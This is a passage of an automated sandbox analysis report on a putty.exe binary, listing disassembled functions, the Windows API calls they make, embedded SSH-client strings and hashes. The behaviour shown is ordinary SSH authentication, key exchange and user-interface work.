                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: $" from agent$%.*s$%s@%s's password: $).$..\ssh.c$0 && "unexpected return from loadrsakey()"$AES not supported in SSH-1, skipping$Access denied$Authenticated using RSA key "$Authentication refused$Authentication successful$Bizarre response to RSA authentication response$Bizarre response to offer of public key$Configured key file not in Pageant$Couldn't load private key from $CryptoCard authentication declined$CryptoCard authentication refused.$CryptoCard challenge packet was badly formed$Encrypted session key$Encryption not successfully enabled$Failed to authenticate with our public key.$Failed to get reply from Pageant$Failed to read SSH-1 public keys from public key packet$Host key fingerprint is:$Initialised %s encryption$Installing CRC compensation attack detector$Key refused$No passphrase required.$No reply received from Pageant$No supported authentication methods available$No supported ciphers found$No username provided$Pageant failed to answer challenge$Pageant has %d SSH-1 keys$Pageant is running. Requesting keys.$Pageant key #%d matches configured key file$Pageant key list packet was truncated$Pageant reported negative key count %d$Pageant's response accepted$Pageant's response not accepted$Passphrase for key "%.100s": $Public key packet not received$Reading private key file "%.150s"$Received CryptoCard challenge$Received RSA challenge$Received TIS challenge$Received public keys$Requested CryptoCard authentication$Requested TIS authentication$Response: $SSH CryptoCard authentication$SSH TIS authentication$SSH password$SSH-1 public key encryptions failed due to bad formatting$SSH-1 public key packet stopped before random cookie$SSH-1 public keys were badly formatted$Sending Pageant's response$Sending length-padded password$Sending password with camouflage packets$Sent password$Sent username "%s"$Server refused our public key.$Server violates SSH-1 protocol by not supporting 3DES encryption$Server's RSA challenge was badly formatted$Strange packet received, type %d$Successfully started encryption$TIS authentication declined$TIS authentication refused.$TIS challenge packet was badly formed$Trying Pageant key #%d$Trying public key "%s"$Trying public key authentication.$Trying to enable encryption...$Unable to authenticate$Unable to load private key (%s)$Unable to load private key file "%.150s" (%s)$Unable to use key file "%.150s" (%s)$Unable to use this key file (%s)$Unexpected data from server while waiting for agent response$Unexpected data from server while waiting for user host key response$Unexpected data from server while waiting for user response$User aborted at cipher warning$User aborted at host key verification$Using 3DES encryption$Using Blowfish encryption$Using CryptoCard authentication.%s%s$Using TIS authentication.%s%s$Using single-DES encryption$Wrong passphrase.$[RB$\{E$cipher$gvE$gvE$login as: $pwlen >= bottom && pwlen <= top$rsa$yRB
                            • API String ID: 0-1584414803
                            • Opcode ID: 854cbef0185ae527b17e36f856c96d92cfd1de01eb1fc33cf1278352805f61f2
                            • Instruction ID: 5ab6357f294d438c5d36a22398ba273f6ae04cff57f07f6ad347063ca7a57ab1
                            • Opcode Fuzzy Hash: 854cbef0185ae527b17e36f856c96d92cfd1de01eb1fc33cf1278352805f61f2
                            • Instruction Fuzzy Hash: B2E2D471500304EFDB25AF65DC82BEA3BA5EF04308F15406BFD149A2A2E779D891CB9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00419759 Relevance: 179.6, APIs: 4, Strings: 97, Instructions: 2884COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen
                            • String ID: "$" from agent$%.*s$%s@%s's password: $)$..\ssh.c$Access denied$Access granted$Attempting GSSAPI authentication$Attempting keyboard-interactive authentication$Authenticating with public key "$Configured key file not in Pageant$Confirm new password: $Current password (blank for previously entered password): $Enter new password: $Failed to get reply from Pageant$Further authentication required$Further authentication required$GSSAPI authentication - bad server response$GSSAPI authentication - wrong response from server$GSSAPI authentication failed to get credentials$GSSAPI authentication initialisation failed$GSSAPI authentication initialised$GSSAPI authentication loop finished OK$GSSAPI authentication request refused$GSSAPI import name failed$GSSAPI import name failed - Bad service name$Keyboard-interactive authentication failed$New SSH password$No supported authentication methods available$No supported authentication methods available (server sent: %.*s)$No username provided$Offer of public key accepted$Offered public key$Opened main channel$Pageant failed to answer challenge$Pageant has %d SSH-2 keys$Pageant is running. Requesting keys.$Pageant key #%d matches configured key file$Pageant response contained a negative key count %d$Pageant response was truncated$Passphrase for key "%.100s": $Password authentication failed$Passwords do not match$Primary command failed; attempting fallback$Reading private key file "%.150s"$SSH password$SSH server authentication$SSH server: %.*s$Sending Pageant's response$Sent new password$Sent password$Sent public key signature$Server refused keyboard-interactive authentication$Server refused our key$Server refused our key$Server refused public-key signature despite accepting key!$Server refused public-key signature despite accepting key!$Server refused service request$Server refused to open channel$Server refused to start a shell/command$Server rejected new password$Server requested password change$Server's channel confirmation cited wrong channel$Started a shell/command$Strange packet received during authentication: type %d$Strange packet received: type %d$Trying Pageant key #%d$Unable to authenticate$Unable to load private key ($Unable to load private key (%s)$Unable to load private key file "%.150s" (%s)$Unable to use key file "%.150s" (%s)$Unable to use this key file (%s)$Unexpected data from server while waiting for agent response$Unexpected response to shell/command request: packet type %d$Using keyboard-interactive authentication.%s%.*s$Using username "%s".$Wrong passphrase$enabling delayed compression$exec$gssapi-with-mic$gvE$keyboard-interactive$login as: $main channel$none$p == sigdata_len$password$publickey$s->gsslib$s->type == AUTH_TYPE_PASSWORD$session$shell$simple@putty.projects.tartarus.org$ssh-connection$subsystem
                            • API String ID: 4218353326-358498122
                            • Opcode ID: 28b801f18cb09b0b8810eddfcedb1423b139ba772995c390aa9c99972ba69bed
                            • Instruction ID: 2a746e2a54b65f7c2ee8d83f2b8888ec665777df949624631445853c4857cab6
                            • Opcode Fuzzy Hash: 28b801f18cb09b0b8810eddfcedb1423b139ba772995c390aa9c99972ba69bed
                            • Instruction Fuzzy Hash: 2643D670600201EFCB559F65C885BEA7BB5FF04304F14816BFD089F262DB799991CBAA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004424A0 Relevance: 152.8, APIs: 80, Strings: 6, Instructions: 2255windowtimeCOMMON
                            Download Yara Rule
                            APIs
                            • SetWindowTextA.USER32(?,?), ref: 00442547
                            • SetWindowTextA.USER32(?), ref: 0044255B
                            • PostQuitMessage.USER32(00000000), ref: 004427B9
                            • CreateCaret.USER32(?), ref: 004427E8
                            • ShowCaret.USER32(?), ref: 004427F1
                            • MessageBoxA.USER32(?,Are you sure you want to close this session?,00000000,00000031), ref: 004428AC
                            • DestroyWindow.USER32(?), ref: 004428BA
                            • HideCaret.USER32(?), ref: 004428CE
                            • BeginPaint.USER32(?,?), ref: 004428DB
                            • SelectPalette.GDI32(00000000,?,00000001), ref: 004428F0
                            • RealizePalette.GDI32(00000000), ref: 004428F7
                            • CreateSolidBrush.GDI32 ref: 004429B4
                            • SelectObject.GDI32(00000000,00000000), ref: 004429BE
                            • CreatePen.GDI32(00000000,00000000), ref: 004429CD
                            • SelectObject.GDI32(00000000,00000000), ref: 004429D8
                            • IntersectClipRect.GDI32(00000000,?,?,?,?), ref: 004429EA
                            • ExcludeClipRect.GDI32(00000000,?,00000000,?,?), ref: 00442A23
                            • Rectangle.GDI32(00000000,?,?,?,?), ref: 00442A36
                            • SelectObject.GDI32(00000000,?), ref: 00442A40
                            • DeleteObject.GDI32(00000000), ref: 00442A49
                            • SelectObject.GDI32(00000000,?), ref: 00442A4F
                            • DeleteObject.GDI32(?), ref: 00442A54
                            • GetStockObject.GDI32(0000000D), ref: 00442A5E
                            • SelectObject.GDI32(00000000,00000000), ref: 00442A62
                            • GetStockObject.GDI32(00000006), ref: 00442A66
                            • SelectObject.GDI32(00000000,00000000), ref: 00442A6A
                            • EndPaint.USER32(?,?), ref: 00442A73
                            • ShowCaret.USER32(?), ref: 00442A7C
                            • DestroyCaret.USER32 ref: 00442A9E
                            • TranslateMessage.USER32(?), ref: 00442B62
                            • SendMessageA.USER32(?,00000112,00000160,?), ref: 004432A6
                            • PostMessageA.USER32(?,00000102,00000020,00000000), ref: 00443323
                              • Part of subcall function 0044018C: CreateThread.KERNEL32(00000000,00000000,00440064,00000000,?,?), ref: 004401A1
                              • Part of subcall function 004411E8: ShowWindow.USER32(00000003), ref: 00441227
                            • KillTimer.USER32(?,000004D2), ref: 004435F3
                            • GetCursorPos.USER32(?), ref: 004436B3
                            • TrackPopupMenu.USER32(00000002,?,?,00000000,?,00000000), ref: 004436CD
                            • DefWindowProcA.USER32(?,?,?,?), ref: 00443F60
                            • GetKeyboardState.USER32(?), ref: 00443FA7
                            • ScreenToClient.USER32(?,?), ref: 0044403D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$Select$CaretMessageWindow$Create$Show$ClipDeleteDestroyPaintPalettePostRectStockText$BeginBrushClientCursorExcludeHideIntersectKeyboardKillMenuPopupProcQuitRealizeRectangleScreenSendSolidStateThreadTimerTrackTranslate
                            • String ID: %s Exit Confirmation$----- Session restarted -----$@\G$Are you sure you want to close this session?$putty &%p:%u$putty @%s
                            • API String ID: 752142565-3373460970
                            • Opcode ID: 47551083d44dd765958de2020fbad1a605e75667ed016e04dbdc600830d64faf
                            • Instruction ID: 9f5275cf5d32300d8f35daa72230b967a82ef5414774579fabfbfcadf0fd5b01
                            • Opcode Fuzzy Hash: 47551083d44dd765958de2020fbad1a605e75667ed016e04dbdc600830d64faf
                            • Instruction Fuzzy Hash: B9F22331904204AFFB219F75DD89B6A3BA5FB04716F60013BF918962B2CB799D81CB4D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041C168 Relevance: 93.0, APIs: 3, Strings: 49, Instructions: 2013COMMON
                            Download Yara Rule
                            Strings
                            • expected RSA public key packet from server, xrefs: 0041D4D9
                            • key-exchange algorithm, xrefs: 0041D291
                            • ssh->v2_session_id_len <= sizeof(ssh->v2_session_id), xrefs: 0041DA58
                            • Initialised %s decompression, xrefs: 0041C683
                            • ssh->scmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C62B
                            • Doing Diffie-Hellman group exchange, xrefs: 0041C242
                            • User aborted at cipher warning, xrefs: 0041C2DB
                            • expected key exchange group packet from server, xrefs: 0041C418
                            • (ssh->cscipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DB55
                            • !s->userauth_succeeded, xrefs: 0041C765
                            • (ssh->sccipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C593
                            • Couldn't agree a host key algorithm (available: %s), xrefs: 0041CE70
                            • client-to-server cipher, xrefs: 0041D2E8
                            • server-to-client cipher, xrefs: 0041C334
                            • Server bug prevents key re-exchange (%s), xrefs: 0041C790
                            • ssh->csmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DBF3
                            • Using Diffie-Hellman with standard group "%s", xrefs: 0041D359
                            • Server initiated key re-exchange, xrefs: 0041C734
                            • `|F, xrefs: 0041C88E
                            • Doing RSA key exchange with hash %s, xrefs: 0041D404
                            • User aborted at host key verification, xrefs: 0041D45B
                            • ssh->cscipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041DBA7
                            • (null), xrefs: 0041CDDA, 0041CDDF, 0041CE6A, 0041CE6F, 0041CF4A, 0041CF4F, 0041CFFB, 0041D000
                            • yF, xrefs: 0041C958
                            • Initialised %s compression, xrefs: 0041DC4B
                            • Couldn't agree a server-to-client cipher (available: %s), xrefs: 0041D001
                            • Unexpected data from server while waiting for user host key response, xrefs: 0041D426
                            • Initiating key re-exchange (%s), xrefs: 0041C80E
                            • Initialised %.200s client->server MAC algorithm, xrefs: 0041DC2F
                            • unable to read mp-ints from incoming group packet, xrefs: 0041C462
                            • expected new-keys packet from server, xrefs: 0041C4B8
                            • User aborted at kex warning, xrefs: 0041C394
                            • sizeof(keyspace) >= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C540, 0041DB05
                            • Initialised %.200s server->client MAC algorithm, xrefs: 0041C667
                            • Server supports delayed compression; will try this later, xrefs: 0041D184
                            • Doing Diffie-Hellman key exchange with hash %s, xrefs: 0041D376
                            • Initialised %.200s client->server encryption, xrefs: 0041DC1E
                            • Initialised %.200s server->client encryption, xrefs: 0041C656
                            • ssh->kex->hash->hlen <= sizeof(s->exchange_hash), xrefs: 0041D8F5
                            • Couldn't agree a client-to-server cipher (available: %s), xrefs: 0041CF50
                            • expected key exchange packet from server, xrefs: 0041CCE6
                            • Host key fingerprint is:, xrefs: 0041D9DE
                            • expected key exchange reply packet from server, xrefs: 0041D737
                            • ssh->sccipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS, xrefs: 0041C5DF
                            • unable to parse key exchange reply packet, xrefs: 0041D79D
                            • Couldn't agree a key exchange algorithm (available: %s), xrefs: 0041CDE0
                            • Server's host key did not match the signature supplied, xrefs: 0041DC70
                            • Unexpected data from server while waiting for user response, xrefs: 0041C2A6
                            • ..\ssh.c, xrefs: 0041C53B, 0041C58E, 0041C5DA, 0041C626, 0041C760, 0041D8F0, 0041DA53, 0041DB00, 0041DB50, 0041DBA2, 0041DBEE
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: !s->userauth_succeeded$(null)$(ssh->cscipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$(ssh->sccipher->keylen+7) / 8 <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$..\ssh.c$Couldn't agree a client-to-server cipher (available: %s)$Couldn't agree a host key algorithm (available: %s)$Couldn't agree a key exchange algorithm (available: %s)$Couldn't agree a server-to-client cipher (available: %s)$Doing Diffie-Hellman group exchange$Doing Diffie-Hellman key exchange with hash %s$Doing RSA key exchange with hash %s$Host key fingerprint is:$Initialised %.200s client->server MAC algorithm$Initialised %.200s client->server encryption$Initialised %.200s server->client MAC algorithm$Initialised %.200s server->client encryption$Initialised %s compression$Initialised %s decompression$Initiating key re-exchange (%s)$Server bug prevents key re-exchange (%s)$Server initiated key re-exchange$Server supports delayed compression; will try this later$Server's host key did not match the signature supplied$Unexpected data from server while waiting for user host key response$Unexpected data from server while waiting for user response$User aborted at cipher warning$User aborted at host key verification$User aborted at kex warning$Using Diffie-Hellman with standard group "%s"$`|F$client-to-server cipher$expected RSA public key packet from server$expected key exchange group packet from server$expected key exchange packet from server$expected key exchange reply packet from server$expected new-keys packet from server$key-exchange algorithm$server-to-client cipher$sizeof(keyspace) >= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->cscipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->csmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->kex->hash->hlen <= sizeof(s->exchange_hash)$ssh->sccipher->blksize <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->scmac->len <= ssh->kex->hash->hlen * SSH2_MKKEY_ITERS$ssh->v2_session_id_len <= sizeof(ssh->v2_session_id)$unable to parse key exchange reply packet$unable to read mp-ints from incoming group packet$yF
                            • API String ID: 0-694999770
                            • Opcode ID: 3d46c534663a6409506d1bb1eba44ef87da18588e1e9bd5013d2724c22fe9d95
                            • Instruction ID: 5653589a9489134109554c6078f4281d632632816c86eb58b1ffd955ad9e2d68
                            • Opcode Fuzzy Hash: 3d46c534663a6409506d1bb1eba44ef87da18588e1e9bd5013d2724c22fe9d95
                            • Instruction Fuzzy Hash: 7803BC71A40205EFDB10DF64C981BDAB7B1FF08314F14806AED18AB262D779ED91CB99
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043F91B Relevance: 89.9, APIs: 34, Strings: 17, Instructions: 639clipboardmemorywindowCOMMON
                            Download Yara Rule
                            APIs
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0043F936
                            • GlobalAlloc.KERNEL32(00002002,?), ref: 0043F94D
                            • GlobalAlloc.KERNEL32(00002002,?), ref: 0043F95A
                            • GlobalLock.KERNEL32(?), ref: 0043F97F
                            • GlobalFree.KERNEL32(?), ref: 0043F991
                            • GlobalFree.KERNEL32(?), ref: 0043F996
                            • GlobalLock.KERNEL32(?), ref: 0043F9A0
                            • GlobalUnlock.KERNEL32(?), ref: 0043F9AC
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043F9D3
                            • _strlen.LIBCMT ref: 0043FA24
                            • _strlen.LIBCMT ref: 0043FB45
                            • _strcat.LIBCMT ref: 0043FB9E
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 0043FDE8
                            • _strcat.LIBCMT ref: 0043FE1D
                            • _strcat.LIBCMT ref: 0043FED3
                            • _strcat.LIBCMT ref: 0043FF4B
                            • GlobalAlloc.KERNEL32(00002002,00000003), ref: 0043FF82
                            • GlobalLock.KERNEL32(00000000), ref: 0043FF90
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFA8
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFC3
                            • GlobalUnlock.KERNEL32(?), ref: 0043FFC8
                            • SendMessageA.USER32(00008002,00000001,00000000), ref: 0043FFE3
                            • OpenClipboard.USER32 ref: 0043FFEB
                            • EmptyClipboard.USER32 ref: 0043FFF5
                            • SetClipboardData.USER32(0000000D,?), ref: 00440006
                            • SetClipboardData.USER32(00000001,?), ref: 0044000D
                            • RegisterClipboardFormatA.USER32(Rich Text Format), ref: 0044001C
                            • SetClipboardData.USER32(00000000), ref: 00440023
                            • CloseClipboard.USER32 ref: 00440025
                            • GlobalFree.KERNEL32(?), ref: 00440036
                            • GlobalFree.KERNEL32(?), ref: 0044003B
                            • SendMessageA.USER32(00008002,00000000,00000000), ref: 0044004F
                            • GlobalFree.KERNEL32(?), ref: 00440053
                            • GlobalFree.KERNEL32(?), ref: 0044005D
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Global$Clipboard$Free$Unlock_strcat$AllocByteCharDataLockMultiWide$MessageSend_strlen$CloseEmptyFormatOpenRegister
                            • String ID: ..\windows\window.c$Rich Text Format$\'%02x$\b $\b0 $\cf%d $\highlight%d $\par$\red%d\green%d\blue%d;$\u%d$\ul $\ulnone $tindex + multilen <= len2${\colortbl ;${\rtf1\ansi\deff0{\fonttbl\f0\fmodern %s;}\f0\fs%d${\uc%d\u%d$MG
                            • API String ID: 3225255805-1080685794
                            • Opcode ID: ca7626dbaca4f28c7a598a3bfd2967bab55823eb482658af29f889955e2a1360
                            • Instruction ID: 64dfe65eea2935fc2791380e89c423e684f693fc487b94f899ccc8a2f008ff8d
                            • Opcode Fuzzy Hash: ca7626dbaca4f28c7a598a3bfd2967bab55823eb482658af29f889955e2a1360
                            • Instruction Fuzzy Hash: 2C320171D00209AFDB21CFA4DC85BAEBBB5EF49304F24507BE805E6261E7389945CB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004451A7 Relevance: 86.0, APIs: 29, Strings: 20, Instructions: 232libraryloaderregistryCOMMON
                            Download Yara Rule
                            APIs
                            • RegOpenKeyA.ADVAPI32(80000002,SOFTWARE\MIT\Kerberos,?), ref: 004451DC
                            • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?,?,?), ref: 00445205
                            • RegQueryValueExA.ADVAPI32(?,InstallDir,00000000,?,00000000,?), ref: 0044523E
                            • LoadLibraryA.KERNEL32(00000000), ref: 0044525D
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00445270
                            • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 0044529C
                            • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 004452A7
                            • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 004452B2
                            • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 004452BD
                            • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 004452C8
                            • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 004452D3
                            • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 004452DE
                            • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 004452E9
                            • GetProcAddress.KERNEL32(00000000,AcquireCredentialsHandleA), ref: 0044532F
                            • GetProcAddress.KERNEL32(00000000,InitializeSecurityContextA), ref: 0044533C
                            • GetProcAddress.KERNEL32(00000000,FreeContextBuffer), ref: 00445349
                            • GetProcAddress.KERNEL32(00000000,FreeCredentialsHandle), ref: 00445356
                            • GetProcAddress.KERNEL32(00000000,DeleteSecurityContext), ref: 00445363
                            • GetProcAddress.KERNEL32(00000000,QueryContextAttributesA), ref: 00445370
                            • GetProcAddress.KERNEL32(00000000,MakeSignature), ref: 0044537D
                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004453A8
                            • GetProcAddress.KERNEL32(00000000,gss_delete_sec_context), ref: 004453E9
                            • GetProcAddress.KERNEL32(00000000,gss_display_status), ref: 004453F4
                            • GetProcAddress.KERNEL32(00000000,gss_get_mic), ref: 004453FF
                            • GetProcAddress.KERNEL32(00000000,gss_import_name), ref: 0044540A
                            • GetProcAddress.KERNEL32(00000000,gss_init_sec_context), ref: 00445415
                            • GetProcAddress.KERNEL32(00000000,gss_release_buffer), ref: 00445420
                            • GetProcAddress.KERNEL32(00000000,gss_release_cred), ref: 0044542B
                            • GetProcAddress.KERNEL32(00000000,gss_release_name), ref: 00445436
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$LibraryLoadQueryValue$CloseOpen
                            • String ID: AcquireCredentialsHandleA$DeleteSecurityContext$FreeContextBuffer$FreeCredentialsHandle$InitializeSecurityContextA$InstallDir$MakeSignature$QueryContextAttributesA$SOFTWARE\MIT\Kerberos$Using GSSAPI from user-specified library '%s'$\bin\gssapi32.dll$gss_delete_sec_context$gss_display_status$gss_get_mic$gss_import_name$gss_init_sec_context$gss_release_buffer$gss_release_cred$gss_release_name$secur32.dll
                            • API String ID: 481383669-4140184695
                            • Opcode ID: 2108d3fb54c964d982f4a639e771a56639495aac7d649db11cf17e573ce93ade
                            • Instruction ID: dcd7c7f827d472f1284be5c32c41cc90b0e63d8da783b99a3823c4c507cf7148
                            • Opcode Fuzzy Hash: 2108d3fb54c964d982f4a639e771a56639495aac7d649db11cf17e573ce93ade
                            • Instruction Fuzzy Hash: DF71A0B1A40306BBD7109F769CC9A2ABFECFB44755B50042BF448D7691EBB8E4108E9D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004010F6 Relevance: 55.4, APIs: 2, Strings: 29, Instructions: 1167COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0040B625: _strlen.LIBCMT ref: 0040B632
                              • Part of subcall function 0040B625: _strcat.LIBCMT ref: 0040B644
                            • _strlen.LIBCMT ref: 00401798
                            • _strlen.LIBCMT ref: 00401CDA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat
                            • String ID: %.*s$%c%.*s$-%c expects at least two colons in its argument$-agent$-ipv4$-ipv6$-load$-loghost$-nc$-nc expects argument of form 'host:port'$-noagent$-nopageant$-nopagent$-pageant$-pagent$-pw$-raw$-rlogin$-sercfg$-serial$-ssh$-telnet$1.5$L%s$Unrecognised suboption "-sercfg %c"$Unrecognised suboption "-sercfg %s"$the -pw option can only be used with the SSH protocol$the -sercfg option can only be used with the serial protocol$unable to open command file "%s"
                            • API String ID: 1497175149-3160668167
                            • Opcode ID: 850225c6b70dc2e53f97a4abb77eb0d96d229cb41292139f45c1cd0b29a92017
                            • Instruction ID: 075547cb0e17a4f786c5e50b4f43e74b565f1ebd088bad941454779dac3cf793
                            • Opcode Fuzzy Hash: 850225c6b70dc2e53f97a4abb77eb0d96d229cb41292139f45c1cd0b29a92017
                            • Instruction Fuzzy Hash: F772EF31648305BAFF216E66AD42BAB3B59DF1072DF20403FFD04F91E2EA798A50954D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043E753 Relevance: 48.0, APIs: 24, Strings: 3, Instructions: 779COMMON
                            Download Yara Rule
                            APIs
                            • SelectObject.GDI32(?), ref: 0043E9DB
                            • SetTextColor.GDI32(?,?), ref: 0043E9E5
                            • SetBkColor.GDI32(?,?), ref: 0043E9EF
                            • SetBkMode.GDI32(?,00000002), ref: 0043EA0B
                            • SetTextAlign.GDI32(?,00000006), ref: 0043EAFB
                            • SetTextAlign.GDI32(?,00000000), ref: 0043EB1A
                            • IsDBCSLeadByteEx.KERNEL32(00000000), ref: 0043ED37
                            • MultiByteToWideChar.KERNEL32(00000004,?,00000002,00000000,00000001), ref: 0043ED7C
                            • MultiByteToWideChar.KERNEL32(00000004,?,00000001,00000000,00000001), ref: 0043EDA4
